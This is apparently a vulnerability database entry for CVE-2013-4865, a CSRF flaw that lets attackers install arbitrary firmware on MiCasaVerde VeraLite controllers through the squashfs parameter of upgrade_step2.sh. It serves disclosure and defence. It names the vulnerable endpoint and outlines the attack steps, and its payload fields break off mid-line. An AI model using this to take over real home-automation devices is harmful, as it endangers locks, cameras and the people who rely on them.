CVE-2013-4865
Description
Cross-site request forgery (CSRF) vulnerability in upgrade_step2.sh in MiCasaVerde VeraLite with firmware 1.5.408 allows remote attackers to hijack the authentication of users for requests that install arbitrary firmware via the squashfs parameter.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
CSRF in MiCasaVerde VeraLite 1.5.408 allows attackers to hijack authentication and install arbitrary firmware via the squashfs parameter.
Vulnerability
Cross-site request forgery (CSRF) vulnerability exists in the upgrade_step2.sh script of MiCasaVerde VeraLite running firmware version 1.5.408. The script does not implement any anti-CSRF tokens or origin validation, allowing an attacker to craft a malicious request that, when executed by an authenticated user, can install arbitrary firmware through the squashfs parameter [1][2][3].
Exploitation
An attacker must trick an authenticated VeraLite administrator or guest user into visiting a crafted webpage or clicking a link while logged into the VeraLite web interface (or the cloud control panel at cp.mios.com). The attacker constructs a request to upgrade_step2.sh with a malicious squashfs parameter pointing to a firmware image under the attacker's control. No additional authentication is needed because the victim's active session is reused [1][2][3].
Impact
Successful exploitation allows an attacker to install arbitrary firmware on the VeraLite device, effectively gaining full control over the home automation controller. This can lead to complete compromise of the device and potentially the connected home automation network, including door locks, security cameras, and other smart home components [1][2][3].
Mitigation
MiCasaVerde has not released a patched firmware version for this vulnerability. The affected firmware version 1.5.408 appears to be the latest for this product line, and the device may be end-of-life. Users are advised to restrict network access to the VeraLite, disable remote management if possible, and ensure that only trusted users have access to the local or cloud-based control panel [1][2][3].
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2- MiCasaVerde/VeraLitedescription
- Range: = 1.5.408
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"The VeraLite firmware upgrade endpoint `/upgrade_step2.sh` performs no CSRF token validation or origin checking, allowing an attacker to forge authenticated firmware-upgrade requests."
Attack vector
An attacker crafts a web page containing an `
Affected code
The vulnerable endpoint is `/upgrade_step2.sh` on the MiCasaVerde VeraLite running firmware 1.5.408 [ref_id=1][ref_id=2]. The advisory does not specify the internal implementation of this script, but it accepts a `squashfs` parameter to install arbitrary firmware without any CSRF token or origin validation.
What the fix does
No official patch has been released by the vendor. The vendor responded that the lack of CSRF protection was a deliberate design decision to maintain an open system for customers [ref_id=1][ref_id=2]. The advisory recommends mitigating exposure by using access control lists and network segmentation to limit access to authorized personnel [ref_id=1][ref_id=2].
Preconditions
- inputThe attacker must lure an authenticated VeraLite user to visit a malicious web page (e.g., via phishing or an injected iframe).
- networkThe VeraLite web interface must be network-accessible from the victim's browser (typically on the same LAN).
- authThe victim must have an active authenticated session with the VeraLite at the time of the request.
Reproduction
1. Host an HTML page containing: `
Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
3- packetstormsecurity.com/files/122654/MiCasaVerde-VeraLite-1.5.408-Traversal-Authorization-CSRF-Disclosure.htmlmitrex_refsource_MISC
- www.exploit-db.com/exploits/27286mitrex_refsource_MISC
- www3.trustwave.com/spiderlabs/advisories/TWSL2013-019.txtmitrex_refsource_MISC
News mentions
0No linked articles in our index yet.